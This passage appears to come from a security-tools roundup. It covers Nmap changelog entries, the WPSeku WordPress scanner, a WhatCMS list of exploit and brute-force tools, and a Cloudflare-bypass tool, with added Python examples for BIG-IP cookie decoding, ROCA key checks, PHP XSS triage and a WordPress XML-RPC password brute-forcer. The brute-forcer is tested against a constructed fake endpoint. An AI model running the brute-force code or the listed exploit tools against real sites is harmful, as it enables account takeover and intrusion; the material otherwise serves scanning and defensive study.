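    # O_EXCL makes create-if-absent atomic, so a second fetch of the same name
    # (or a pre-existing file) fails with FileExistsError instead of clobbering it.
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(body)
    return target
```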

    • [NSE] Added 9 NSE scripts, from 8 authors, bringing the total up to 588!
    They are all listed at https://nmap.org/nsedoc/, and the summaries are
    below:

    - deluge-rpc-brute performs brute-force credential testing against
    Deluge BitTorrent RPC services, using the new zlib library. [Claudiu Perta]
    - hostmap-crtsh lists subdomains by querying Google's Certificate
    Transparency logs. [Paulino Calderon]
    - [GH#892] http-bigip-cookie decodes unencrypted F5 BIG-IP cookies and
    reports back the IP address and port of the actual server behind the
    load-balancer. [Seth Jackson]
    - http-jsonp-detection Attempts to discover JSONP endpoints in web
    servers. JSONP endpoints can be used to bypass Same-origin Policy
    restrictions in web browsers. [Vinamra Bhatia]
    - http-trane-info obtains information from Trane Tracer SC controllers
    and connected HVAC devices. [Pedro Joaquin]
    - [GH#609] nbd-info uses the new nbd.lua library to query Network Block
    Devices for protocol and file export information. [Mak Kolybabi]
    - rsa-vuln-roca checks for RSA keys generated by Infineon TPMs
    vulnerable to Return Of Coppersmith Attack (ROCA) (CVE-2017-15361). Checks
    SSH and TLS services. [Daniel Miller]
    - [GH#987] smb-enum-services retrieves the list of services running on a
    remote Windows machine. Modern Windows systems require a privileged domain
    account in order to list the services. [Rewanth Cool]
    - tls-alpn checks TLS servers for Application Layer Protocol Negotiation
    (ALPN) support and reports supported protocols. ALPN largely replaces NPN,
    which tls-nextprotoneg was written for. [Daniel Miller]
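
    The http-bigip-cookie entry above is worth a closer look, because the leak is purely a decoding problem. The following is an added example, not Nmap's NSE script: it decodes the plaintext BIGipServer* persistence cookie formats F5 documents (IPv4, IPv6 and the route-domain variants) and pulls them out of Set-Cookie headers. The cookie values and headers in it are constructed for illustration.

```python
import ipaddress
import re
import struct

# Added example, not Nmap's http-bigip-cookie script: decode the unencrypted
# BIGipServer* persistence cookie formats F5 documents. The cookie leaks the
# pool member (backend IP and port) the load balancer sent the client to.
# Cookie values used below are constructed for illustration.

_IPV4_FORM = re.compile(r"^(\d+)\.(\d+)\.0000$")                     # 1677787402.36895.0000
_IPV6_FORM = re.compile(r"^vi([0-9a-fA-F]{32})\.(\d+)$")             # vi<hex ipv6>.<port>
_ROUTE_DOMAIN_FORM = re.compile(r"^rd(\d+)o([0-9a-fA-F]{32})o(\d+)$")  # rd<n>o<hex>o<port>
_COOKIE_HEADER = re.compile(r"^BIGipServer([^=;]*)=([^;]+)")


def _swap_port(encoded: int) -> int:
    """The port is stored little-endian and printed as a decimal, so swap bytes."""
    return struct.unpack(">H", struct.pack("<H", encoded))[0]


def _ip_from_hex(hex32: str) -> str:
    addr = ipaddress.IPv6Address(bytes.fromhex(hex32))
    # IPv4 members in a route domain appear as IPv4-mapped IPv6 (::ffff:a.b.c.d).
    mapped = addr.ipv4_mapped
    return str(mapped) if mapped is not None else str(addr)


def decode_bigip_cookie(value: str):
    """Return (ip, port, route_domain) for a plaintext BIG-IP cookie value, else None."""
    m = _IPV4_FORM.match(value)
    if m:
        ip_num, port_num = int(m.group(1)), int(m.group(2))
        if ip_num > 0xFFFFFFFF or port_num > 0xFFFF:
            return None
        # The IPv4 address is a little-endian 32-bit integer written in decimal.
        ip = str(ipaddress.IPv4Address(struct.pack("<I", ip_num)))
        return ip, _swap_port(port_num), 0
    m = _IPV6_FORM.match(value)
    if m:
        port_num = int(m.group(2))
        if port_num > 0xFFFF:
            return None
        return _ip_from_hex(m.group(1)), _swap_port(port_num), 0
    m = _ROUTE_DOMAIN_FORM.match(value)
    if m:
        # In the route-domain form the port is a plain decimal, not byte-swapped.
        return _ip_from_hex(m.group(2)), int(m.group(3)), int(m.group(1))
    return None  # encrypted cookie or unknown format


def find_bigip_cookies(set_cookie_headers):
    """Scan Set-Cookie header values; returns (pool_name, raw_value, decoded) tuples.
    decoded is None when the cookie is present but encrypted or unrecognised."""
    found = []
    for header in set_cookie_headers:
        m = _COOKIE_HEADER.match(header.strip())
        if m:
            found.append((m.group(1), m.group(2), decode_bigip_cookie(m.group(2))))
    return found


if __name__ == "__main__":
    # Constructed response headers, as a scanner would see them.
    headers = [
        "BIGipServerweb_pool=1677787402.36895.0000; path=/",
        "PHPSESSID=abc123; path=/; HttpOnly",
    ]
    for pool, raw, decoded in find_bigip_cookies(headers):
        print(pool, raw, "->", decoded)
```

    A cookie that does not match any of the three forms is most likely one the BIG-IP has been configured to encrypt; the function then returns None rather than guessing, which is the right answer for a scanner report.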

    • [GH#978] Fixed Nsock on Windows giving errors when selecting on STDIN.
    This was causing Ncat 7.60 in connect mode to quit with error: libnsock
    select_loop(): nsock_loop error 10038: An operation was attempted on
    something that is not a socket. [nnposter]

    • [Ncat][GH#197][GH#1049] Fix --ssl connections from dropping on
    renegotiation, the same issue that was partially fixed for server mode in
    [GH#773]. Reported on Windows with -e by pkreuzt and vinod272. [Daniel
    Miller]

    • [NSE][GH#1062][GH#1149] Some changes to brute.lua to better handle
    misbehaving or rate-limiting services. Most significantly,
    brute.killstagnated now defaults to true. Thanks to xp3s and Adamtimtim for
    reporting infinite loops and proposing changes.

    • [NSE] VNC scripts now support Apple Remote Desktop authentication (auth
    type 30). [Daniel Miller]

    • [NSE][GH#1111] Fix a script crash in ftp.lua when PASV connection timed
    out. [Aniket Pandey]

    • [NSE][GH#1114] Update bitcoin-getaddr to receive more than one response
    message, since the first message usually only has one address in it. [h43z]

    • [Ncat][GH#1139] Ncat now selects the correct default port for a given
    proxy type. [Pavel Zhukov]

    • [NSE] memcached-info can now gather information from the UDP memcached
    service in addition to the TCP service. The UDP service is frequently used
    as a DDoS reflector and amplifier. [Daniel Miller]

    • [NSE][GH#1129] Changed url.absolute() behavior with respect to dot and
    dot-dot path segments to comply with RFC 3986, section 5.2. [nnposter]

    • Removed deprecated and undocumented aliases for several long options that
    used underscores instead of hyphens, such as --max_retries. [Daniel Miller]

    • Improved service scan's treatment of soft matches in two ways. First of
    all, any probes that could result in a full match with the soft matched
    service will now be sent, regardless of rarity. This improves the chances
    of matching unusual services on non-standard ports. Second, probes are now
    skipped if they don't contain any signatures for the soft matched service.
    Previously the probes would still be run as long as the target port number
    matched the probe's specification. Together, these changes should make
    service/version detection faster and more accurate. For more details on
    how it works, see https://nmap.org/book/vscan.html. [Daniel Miller]

    • --version-all now turns off the soft match optimization, ensuring that
    all probes really are sent, even if there aren't any existing match lines
    for the softmatched service. This is slower, but gives the most
    comprehensive results and produces better fingerprints for submission.
    [Daniel Miller]

    • [NSE][GH#1083] New set of Telnet softmatches for version detection based
    on Telnet DO/DON'T options offered, covering a wide variety of devices and
    operating systems. [D Roberson]

    • [GH#1112] Resolved crash opportunities caused by unexpected libpcap
    version string format. [Gisle Vanem, nnposter]

    • [NSE][GH#1090] Fix false positives in rexec-brute by checking responses
    for indications of login failure. [Daniel Miller]

    • [NSE][GH#1099] Fix http-fetch to keep downloaded files in separate
    destination directories. [Aniket Pandey]

    • [NSE] Added new fingerprints to http-default-accounts:
    + Hikvision DS-XXX Network Camera and NUOO DVR [Paulino Calderon]
    + [GH#1074] ActiveMQ, Purestorage, and Axis Network Cameras [Rob
    Fitzpatrick, Paulino Calderon]

    • Added a new service detection match for WatchGuard Authentication
    Gateway. [Paulino Calderon]

    • [NSE][GH#1038][GH#1037] Script qscan was not observing interpacket delays
    (parameter qscan.delay). [nnposter]

    • [NSE][GH#1046] Script http-headers now fails properly if the target does
    not return a valid HTTP response. [spacewander]

    • [Ncat][Nsock][GH#972] Remove RC4 from the list of TLS ciphers used by
    default, in accordance with RFC 7465. [Codarren Velvindron]

    • [NSE][GH#1022] Fix a false positive condition in ipmi-cipher-zero caused
    by not checking the error code in responses. Implementations which return
    an error are not vulnerable. [Juho Jokelainen]

    • [NSE][GH#958] Two new libraries for NSE.

    - idna - Support for internationalized domain names in applications
    (IDNA)
    - punycode (a transfer encoding syntax used in IDNA) [Rewanth Cool]

    • [NSE] New fingerprints for http-enum:

    - [GH#954] Telerik UI CVE-2017-9248 [Harrison Neal]
    - [GH#767] Many WordPress version detections [Rewanth Cool]

    • [GH#981][GH#984][GH#996][GH#975] Fixed Ncat proxy authentication issues
    [nnposter]:

    - Usernames and/or passwords could not be empty
    - Passwords could not contain colons
    - SOCKS5 authentication was not properly documented
    - SOCKS5 authentication had a memory leak

    • [GH#1009][GH#1013] Fixes to autoconf header files to allow autoreconf to
    be run. [Lukas Schwaighofer]

    • [GH#977] Improved DNS service version detection coverage and consistency
    by using data from a Project Sonar Internet wide survey. Numerous false
    positives were removed and reliable softmatches added. Match lines for
    version.bind responses were also consolidated using the technique below.
    [Tom Sellers]

    • [GH#977] Changed version probe fallbacks so as to work cross protocol
    (TCP/UDP). This enables consolidating match lines for services where the
    responses on TCP and UDP are similar. [Tom Sellers]

    • [NSE][GH#532] Added the zlib library for NSE so scripts can easily handle
    compression. This work started during GSOC 2014, so we're particularly
    pleased to finally integrate it! [Claudiu Perta, Daniel Miller]

    • [NSE][GH#1004] Fixed handling of brute.retries variable. It was being
    treated as the number of tries, not retries, and a value of 0 would result
    in infinite retries. Instead, it is now the number of retries, defaulting
    to 2 (3 total tries), with no option for infinite retries.

    • [NSE] http-devframework-fingerprints.lua supports Jenkins server
    detection and returns extra information when Jenkins is detected [Vinamra
    Bhatia]

    • [GH#926] The rarity level of MS SQL's service detection probe was
    decreased. Now we can find MS SQL in odd ports without increasing version
    intensity. [Paulino Calderon]

    • [GH#957] Fix reporting of zlib and libssh2 versions in "nmap --version".
    We were always reporting the version number of the included source, even
    when a different version was actually linked. [Pavel Zhukov]

    • Add a new helper function for nmap-service-probes match lines: $I(1,">")
    will unpack an unsigned big-endian integer value up to 8 bytes wide from
    capture 1. The second option can be "<" for little-endian. [Daniel Miller]
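
    The rsa-vuln-roca script listed earlier in this changelog relies on a purely arithmetic fingerprint of the public modulus, so it can be run against any RSA key regardless of where it was found (SSH host key, TLS certificate, PGP key). The following is an added example, not Nmap's script: it re-implements that fingerprint and parses the modulus out of an OpenSSH "ssh-rsa" public key line. The modulus it tests is constructed to have the same residues as a vulnerable key; it is not a real key.

```python
import base64
import math
import struct

# Added example, not Nmap's rsa-vuln-roca script: a re-implementation of the ROCA
# (CVE-2017-15361) fingerprint. Keys from the affected Infineon library have
# n = p*q with p = k*M + (65537^a mod M) for a primorial M, so for every small
# prime r dividing M, n mod r is a power of 65537 mod r. A random modulus fails
# that test for at least one of the primes below with overwhelming probability.
# constructed_roca_like_modulus() is NOT a real key, just a number with the
# right residues, so the check can be exercised offline.

SMALL_PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61,
                67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131,
                137, 139, 149, 151, 157, 163, 167]
GENERATOR = 65537
PRIMORIAL = math.prod(SMALL_PRIMES)


def _reachable_residues(prime: int, g: int = GENERATOR) -> set:
    """{g^k mod prime for all k}: the only residues a ROCA modulus can take."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = (x * g) % prime
    return seen


_RESIDUES = {p: _reachable_residues(p) for p in SMALL_PRIMES}


def is_roca_fingerprint(n: int) -> bool:
    """True when n matches the ROCA fingerprint for every small prime."""
    return all((n % p) in _RESIDUES[p] for p in SMALL_PRIMES)


def _read_ssh_string(buf: bytes, off: int):
    (length,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + length], off + 4 + length


def modulus_from_ssh_rsa(line: str) -> int:
    """Extract n from an OpenSSH 'ssh-rsa AAAA...' public key line."""
    blob = base64.b64decode(line.split()[1])
    keytype, off = _read_ssh_string(blob, 0)
    if keytype != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key")
    _e, off = _read_ssh_string(blob, off)
    n_bytes, _ = _read_ssh_string(blob, off)
    return int.from_bytes(n_bytes, "big")


def _ssh_mpint(x: int) -> bytes:
    body = x.to_bytes((x.bit_length() + 8) // 8, "big")  # keeps the sign bit clear
    return struct.pack(">I", len(body)) + body


def ssh_rsa_line(e: int, n: int) -> str:
    """Encode (e, n) as an OpenSSH public key line; used here to build fixtures."""
    blob = struct.pack(">I", 7) + b"ssh-rsa" + _ssh_mpint(e) + _ssh_mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode()


def constructed_roca_like_modulus(a: int = 17, b: int = 29) -> int:
    """Constructed test value: same residues mod each small prime as a real ROCA n."""
    return pow(GENERATOR, a, PRIMORIAL) * pow(GENERATOR, b, PRIMORIAL)


if __name__ == "__main__":
    key_line = ssh_rsa_line(65537, constructed_roca_like_modulus())
    print("ROCA fingerprint:", is_roca_fingerprint(modulus_from_ssh_rsa(key_line)))
```

    The fingerprint is deterministic for affected keys and probabilistic against everything else: each prime only rules out a fraction of random moduli, which is why the check uses dozens of them rather than one.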


    WPSeku v0.4 - Wordpress Security Scanner


    WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

    Installation
    $ git clone https://github.com/m4ll0k/WPSeku.git wpseku
    $ cd wpseku
    $ pip3 install -r requirements.txt
    $ python3 wpseku.py

    Usage

    Generic Scan
    python3 wpseku.py --url https://www.xxxxxxx.com --verbose

    • Output
    ----------------------------------------
    _ _ _ ___ ___ ___| |_ _ _
    | | | | . |_ -| -_| '_| | |
    |_____| _|___|___|_,_|___|
    |_| v0.4.0

    WPSeku - Wordpress Security Scanner
    by Momo Outaadi (m4ll0k)
    ----------------------------------------

    [ + ] Target: https://www.xxxxxxx.com
    [ + ] Starting: 02:38:51

    [ + ] Server: Apache
    [ + ] Uncommon header "X-Pingback" found, with contents: https://www.xxxxxxx.com/xmlrpc.php
    [ i ] Checking Full Path Disclosure...
    [ + ] Full Path Disclosure: /home/ehc/public_html/wp-includes/rss-functions.php
    [ i ] Checking wp-config backup file...
    [ + ] wp-config.php available at: https://www.xxxxxxx.com/wp-config.php
    [ i ] Checking common files...
    [ + ] robots.txt file was found at: https://www.xxxxxxx.com/robots.txt
    [ + ] xmlrpc.php file was found at: https://www.xxxxxxx.com/xmlrpc.php
    [ + ] readme.html file was found at: https://www.xxxxxxx.com/readme.html
    [ i ] Checking directory listing...
    [ + ] Dir "/wp-admin/css" listing enable at: https://www.xxxxxxx.com/wp-admin/css/
    [ + ] Dir "/wp-admin/images" listing enable at: https://www.xxxxxxx.com/wp-admin/images/
    [ + ] Dir "/wp-admin/includes" listing enable at: https://www.xxxxxxx.com/wp-admin/includes/
    [ + ] Dir "/wp-admin/js" listing enable at: https://www.xxxxxxx.com/wp-admin/js/
    ......

    Bruteforce Login
    python3 wpseku.py --url https://www.xxxxxxx.com --brute --user test --wordlist wl.txt --verbose

    • Output
    ----------------------------------------
    _ _ _ ___ ___ ___| |_ _ _
    | | | | . |_ -| -_| '_| | |
    |_____| _|___|___|_,_|___|
    |_| v0.4.0

    WPSeku - Wordpress Security Scanner
    by Momo Outaadi (m4ll0k)
    ----------------------------------------

    [ + ] Target: https://www.xxxxxxx.com
    [ + ] Starting: 02:46:32

    [ + ] Bruteforcing Login via XML-RPC...
    [ i ] Setting user: test
    [ + ] Valid Credentials:

    -----------------------------
    | Username | Passowrd |
    -----------------------------
    | test | kamperasqen13 |
    -----------------------------
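
    The "Bruteforcing Login via XML-RPC" step above works because WordPress exposes authenticated methods over xmlrpc.php and answers a bad password with a distinct fault. The following is an added example, not WPSeku's code: it builds the wp.getUsersBlogs request, classifies the three kinds of answer a scanner sees (valid, invalid, and "not XML-RPC at all", which usually means a WAF or rate limiter), and wraps that in a wordlist loop. fake_wordpress() is a constructed stand-in for the endpoint so the whole thing runs offline.

```python
import xmlrpc.client

# Added example, not WPSeku's code: how a credential check over WordPress
# XML-RPC works. wp.getUsersBlogs takes (username, password): valid credentials
# return an array of blog structs, invalid ones a fault with code 403.
# fake_wordpress() is a constructed stand-in for /xmlrpc.php so this runs offline.


def build_login_request(username: str, password: str) -> bytes:
    """XML-RPC request body for wp.getUsersBlogs."""
    body = xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")
    return body.encode()


def classify_response(body: bytes) -> str:
    """'valid', 'invalid' or 'unknown' (WAF page, rate limit, XML-RPC disabled...)."""
    try:
        params, _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return "invalid" if fault.faultCode == 403 else "unknown"
    except Exception:  # not XML-RPC at all: HTML error page, empty body, etc.
        return "unknown"
    return "valid" if params and isinstance(params[0], list) else "unknown"


def brute_force(send, username: str, wordlist, max_unknown: int = 3):
    """send(body) -> response body. Stops at the first valid password, or after
    max_unknown non-XML-RPC answers in a row (the target is probably blocking us)."""
    unknown_streak = 0
    for password in wordlist:
        verdict = classify_response(send(build_login_request(username, password)))
        if verdict == "valid":
            return password
        unknown_streak = unknown_streak + 1 if verdict == "unknown" else 0
        if unknown_streak >= max_unknown:
            return None
    return None


def fake_wordpress(correct_password: str):
    """Constructed xmlrpc.php stand-in with WordPress-like responses."""
    def send(body: bytes) -> bytes:
        (user, password), method = xmlrpc.client.loads(body)
        if method != "wp.getUsersBlogs":
            fault = xmlrpc.client.Fault(-32601, "server error. requested method not found")
        elif password != correct_password:
            fault = xmlrpc.client.Fault(403, "Incorrect username or password.")
        else:
            blogs = [{"blogid": "1", "url": "https://example.test/", "isAdmin": user == "admin"}]
            return xmlrpc.client.dumps((blogs,), methodresponse=True).encode()
        return xmlrpc.client.dumps(fault, methodresponse=True).encode()
    return send


if __name__ == "__main__":
    print(brute_force(fake_wordpress("kamperasqen13"), "test", ["123456", "kamperasqen13"]))
```

    Treating "unknown" as a stop signal rather than as a miss matters in practice: a WAF that starts returning an HTML block page would otherwise burn the whole wordlist without a single real verdict.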

    Scan plugin, theme and WordPress code
    python3 wpseku.py --scan <dir/file> --verbose

    Note: tested against the Akismet plugin directory https://plugins.svn.wordpress.org/akismet
    • Output
    ----------------------------------------
    _ _ _ ___ ___ ___| |_ _ _
    | | | | . |_ -| -_| '_| | |
    |_____| _|___|___|_,_|___|
    |_| v0.4.0

    WPSeku - Wordpress Security Scanner
    by Momo Outaadi (m4ll0k)
    ----------------------------------------

    [ + ] Checking PHP code...
    [ + ] Scanning directory...
    [ i ] Scanning trunk/class.akismet.php file
    ----------------------------------------------------------------------------------------------------------
    | Line | Possibile Vuln. | String |
    ----------------------------------------------------------------------------------------------------------
    | 597 | Cross-Site Scripting | [b"$_GET['action']", b"$_GET['action']"] |
    | 601 | Cross-Site Scripting | [b"$_GET['for']", b"$_GET['for']"] |
    | 140 | Cross-Site Scripting | [b"$_POST['akismet_comment_nonce']", b"$_POST['akismet_comment_nonce']"] |
    | 144 | Cross-Site Scripting | [b"$_POST['_ajax_nonce-replyto-comment']"] |
    | 586 | Cross-Site Scripting | [b"$_POST['status']", b"$_POST['status']"] |
    | 588 | Cross-Site Scripting | [b"$_POST['spam']", b"$_POST['spam']"] |
    | 590 | Cross-Site Scripting | [b"$_POST['unspam']", b"$_POST['unspam']"] |
    | 592 | Cross-Site Scripting | [b"$_POST['comment_status']", b"$_POST['comment_status']"] |
    | 599 | Cross-Site Scripting | [b"$_POST['action']", b"$_POST['action']"] |
    | 214 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"] |
    | 403 | Cross-Site Scripting | [b"$_SERVER['REQUEST_TIME_FLOAT']", b"$_SERVER['REQUEST_TIME_FLOAT']"] |
    | 861 | Cross-Site Scripting | [b"$_SERVER['REMOTE_ADDR']", b"$_SERVER['REMOTE_ADDR']"] |
    | 930 | Cross-Site Scripting | [b"$_SERVER['HTTP_USER_AGENT']", b"$_SERVER['HTTP_USER_AGENT']"] |
    | 934 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"] |
    | 1349 | Cross-Site Scripting | [b"$_SERVER['REMOTE_ADDR']"] |
    ----------------------------------------------------------------------------------------------------------
    [ i ] Scanning trunk/wrapper.php file
    [ + ] Not found vulnerabilities
    [ i ] Scanning trunk/akismet.php file
    -----------------------------------------------
    | Line | Possibile Vuln. | String |
    -----------------------------------------------
    | 55 | Authorization Hole | [b'is_admin()'] |
    -----------------------------------------------
    [ i ] Scanning trunk/class.akismet-cli.php file
    [ + ] Not found vulnerabilities
    [ i ] Scanning trunk/class.akismet-widget.php file
    [ + ] Not found vulnerabilities
    [ i ] Scanning trunk/index.php file
    [ + ] Not found vulnerabilities
    [ i ] Scanning trunk/class.akismet-admin.php file
    --------------------------------------------------------------------------------------------------------------------
    | Line | Possibile Vuln. | String |
    --------------------------------------------------------------------------------------------------------------------
    | 39 | Cross-Site Scripting | [b"$_GET['page']", b"$_GET['page']"] |
    | 134 | Cross-Site Scripting | [b"$_GET['akismet_recheck']", b"$_GET['akismet_recheck']"] |
    | 152 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
    | 190 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
    | 388 | Cross-Site Scripting | [b"$_GET['recheckqueue']"] |
    | 841 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
    | 843 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
    | 850 | Cross-Site Scripting | [b"$_GET['action']"] |
    | 851 | Cross-Site Scripting | [b"$_GET['action']"] |
    | 852 | Cross-Site Scripting | [b"$_GET['_wpnonce']", b"$_GET['_wpnonce']"] |
    | 868 | Cross-Site Scripting | [b"$_GET['token']", b"$_GET['token']"] |
    | 869 | Cross-Site Scripting | [b"$_GET['token']"] |
    | 873 | Cross-Site Scripting | [b"$_GET['action']"] |
    | 874 | Cross-Site Scripting | [b"$_GET['action']"] |
    | 1005 | Cross-Site Scripting | [b"$_GET['akismet_recheck_complete']"] |
    | 1006 | Cross-Site Scripting | [b"$_GET['recheck_count']"] |
    | 1007 | Cross-Site Scripting | [b"$_GET['spam_count']"] |
    | 31 | Cross-Site Scripting | [b"$_POST['action']", b"$_POST['action']"] |
    | 256 | Cross-Site Scripting | [b"$_POST['_wpnonce']"] |
    | 260 | Cross-Site Scripting | [b'$_POST[$option]', b'$_POST[$option]'] |
    | 267 | Cross-Site Scripting | [b"$_POST['key']"] |
    | 392 | Cross-Site Scripting | [b"$_POST['offset']", b"$_POST['offset']", b"$_POST['limit']", b"$_POST['limit']"] |
    | 447 | Cross-Site Scripting | [b"$_POST['id']"] |
    | 448 | Cross-Site Scripting | [b"$_POST['id']"] |
    | 460 | Cross-Site Scripting | [b"$_POST['id']", b"$_POST['url']"] |
    | 461 | Cross-Site Scripting | [b"$_POST['id']"] |
    | 464 | Cross-Site Scripting | [b"$_POST['url']"] |
    | 388 | Cross-Site Scripting | [b"$_REQUEST['action']", b"$_REQUEST['action']"] |
    | 400 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"] |
    --------------------------------------------------------------------------------------------------------------------
    [ i ] Scanning trunk/class.akismet-rest-api.php file
    [ + ] Not found vulnerabilities
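
    The scan output above reports every superglobal access as a possible Cross-Site Scripting finding, which is why a plugin as heavily reviewed as Akismet shows dozens of hits: a value compared in an if statement is not an XSS sink. The following is an added example, not WPSeku's scanner: a line-based check in the same spirit with two refinements a reviewer wants. A superglobal is only reported as XSS when the same line also writes it to output without an escaping function, and is_admin() is flagged because it tests whether the request is for an admin page, not whether the user is an administrator (current_user_can() is the correct check). SAMPLE_PHP is constructed, not Akismet code.

```python
import re

# Added example, not WPSeku's scanner: line-based PHP source triage. A superglobal
# on a line with an output sink and no escaping function is reported as XSS; a
# superglobal with no sink is reported for review; is_admin() used as an
# authorization check is reported as an Authorization Hole. SAMPLE_PHP is a
# constructed snippet, not code from any real plugin.

SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\s*\[")
OUTPUT_SINK = re.compile(r"\b(echo|print|printf|_e)\b|<\?=")
ESCAPER = re.compile(
    r"\b(esc_html|esc_attr|esc_url|esc_js|esc_textarea|htmlspecialchars|intval|absint|"
    r"sanitize_text_field|wp_kses(_post)?)\s*\("
)
IS_ADMIN_MISUSE = re.compile(r"\bis_admin\s*\(\s*\)")


def scan_php(source: str):
    """Return [(line_no, category, stripped_line)] findings for one PHP file."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if SUPERGLOBAL.search(line):
            if OUTPUT_SINK.search(line) and not ESCAPER.search(line):
                findings.append((line_no, "Cross-Site Scripting", line.strip()))
            elif not OUTPUT_SINK.search(line):
                findings.append((line_no, "Untrusted input (review)", line.strip()))
            # sink plus escaper: nothing to report on this line
        if IS_ADMIN_MISUSE.search(line):
            findings.append((line_no, "Authorization Hole", line.strip()))
    return findings


SAMPLE_PHP = """<?php
$action = $_GET['action'];
if ( $action === 'save' ) { save_settings(); }
echo $_GET['page'];
echo esc_html( $_GET['view'] );
if ( is_admin() ) { purge_everything(); }
if ( current_user_can( 'manage_options' ) ) { purge_everything(); }
"""

if __name__ == "__main__":
    for line_no, category, text in scan_php(SAMPLE_PHP):
        print(f"{line_no:>4} | {category:<26} | {text}")
```

    This is still a per-line heuristic: a value read on one line and echoed on another is missed, and that is the point at which a real taint analysis, not a grep, is needed.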

    Credits and Contributors
    Original idea and script from WPScan Team (https://wpscan.org/)
    WPScan Vulnerability Database (https://wpvulndb.com/api)



    WhatCMS - CMS Detection And Exploit Kit Based On Whatcms.org API


    CMS Detection and Exploit Kit based on Whatcms.org API.

    Introduction
    Whatcms.sh can currently detect more than 330 different CMS applications and services, and then lists the security audit tools that apply to the detected CMS.
    You need a whatcms.org API key to use the tool.

    Use
    Usage: ./whatcms.sh example.com
        -h          Display help message
        -wh         Check hosting details
        --tools     Display tools information

    Information

    Detected CMSs
    CMS list

    Included tools
    TOOL            | UTILITY               | REPO URL
    Dumb0           | Username Scraper Tool | https://github.com/0verl0ad/Dumb0/
    CMSsc4n         | Identify Tool         | https://github.com/n4xh4ck5/CMSsc4n
    Puppet          | Identify Tool         | https://github.com/Poil/puppet-websites-facts
    pyfiscan        | Identify Tool         | https://github.com/fgeek/pyfiscan
    XAttacker       | Exploit Tool          | https://github.com/Moham3dRiahi/XAttacker
    beecms          | Exploit Tool          | https://github.com/CHYbeta/cmsPoc
    CMSXPL          | Exploit Tool          | https://github.com/tanprathan/CMS-XPL
    JMassExploiter  | Exploit Tool          | https://github.com/anarcoder/JoomlaMassExploiter
    WPMassExploiter | Exploit Tool          | https://github.com/anarcoder/WordPressMassExploiter
    CMSExpFram      | Exploit Tool          | https://github.com/Q2h1Cg/CMS-Exploit-Framework
    LotusXploit     | Exploit Tool          | https://github.com/Hood3dRob1n/LotusCMS-Exploit
    BadMod          | Exploit Tool          | https://github.com/MrSqar-Ye/BadMod
    M0B             | Exploit Tool          | https://github.com/mobrine-mob/M0B-tool
    LetMeFuckIt     | Exploit Tool          | https://github.com/onthefrontline/LetMeFuckIt-Scanner
    magescan        | Exploit Tool          | https://github.com/steverobbins/magescan
    PRESTA          | Exploit Tool          | https://github.com/AlisamTechnology/PRESTA-modules-shell-exploit
    EktronE         | Exploit Tool          | https://github.com/tomkallo/Ektron_CMS_8.02_exploit
    XBruteForcer    | Brute Force Tool      | https://github.com/Moham3dRiahi/XBruteForcer
    CoMisSion       | Analyze Tool          | https://github.com/Intrinsec/comission
    droopescan      | Analyze Tool          | https://github.com/droope/droopescan
    CMSmap          | Analyze Tool          | https://github.com/Dionach/CMSmap
    JoomScan        | Analyze Tool          | https://github.com/rezasp/joomscan
    VBScan          | Analyze Tool          | https://github.com/rezasp/vbscan
    JoomlaScan      | Analyze Tool          | https://github.com/drego85/JoomlaScan
    c5scan          | Analyze Tool          | https://github.com/auraltension/c5scan
    T3scan          | Analyze Tool          | https://github.com/Oblady/T3Scan
    moodlescan      | Analyze Tool          | https://github.com/inc0d3/moodlescan
    SPIPScan        | Analyze Tool          | https://github.com/PaulSec/SPIPScan
    WPHunter        | Analyze Tool          | https://github.com/aryanrtm/WP-Hunter
    WPSeku          | Analyze Tool          | https://github.com/m4ll0k/WPSeku
    ACDrupal        | Analyze Tool          | https://github.com/mrmtwoj/ac-drupal
    Plown           | Analyze Tool          | https://github.com/unweb/plown
    conscan         | Analyze Tool          | https://github.com/nullsecuritynet/tools/tree/master/scanner/conscan
    CMSScanner      | Analyze Tool          | https://github.com/CMS-Garden/cmsscanner
    cmsExplorer     | Analyze Tool          | https://code.google.com/archive/p/cms-explorer
    WPScan          | Analyze Tool          | https://github.com/wpscanteam/wpscan
    MooScan         | Analyze Tool          | https://github.com/vortexau/mooscan
    Scanners        | Analyze Tool          | https://github.com/b3o1/Scanners
    LiferayScan     | Analyze Tool          | https://github.com/bcoles/LiferayScan
    InfoLeak        | Analyze Tool          | https://github.com/SIWECOS/InfoLeak-Scanner
    joomlavs        | Analyze Tool          | https://github.com/rastating/joomlavs
    WAScan          | Analyze Tool          | https://github.com/m4ll0k/WAScan
    RedHawk         | Analyze Tool          | https://github.com/Tuhinshubhra/RED_HAWK
    HostileSBF      | Analyze Tool          | https://github.com/nahamsec/HostileSubBruteforcer


    CLOUDKiLL3R - Bypasses Cloudflare Protection Service Via TOR Browser


    CLOUDKiLL3R attempts to bypass Cloudflare's protection service by routing its requests through the Tor Browser's local proxy.

    CLOUDKiLL3R Requirements :
    • Tor Browser, so you can scan as many sites as you want
    • A Python interpreter

    CLOUDKiLL3R Installation
    Make sure that Tor Browser is up and running while working with CLOUDKiLL3R.
    Make sure that the proxy IP and port used by the script match those set in Tor Browser under Preferences > Advanced > Network.
    Put the files below in one folder:
    • FILTER.txt
    • CK.pl
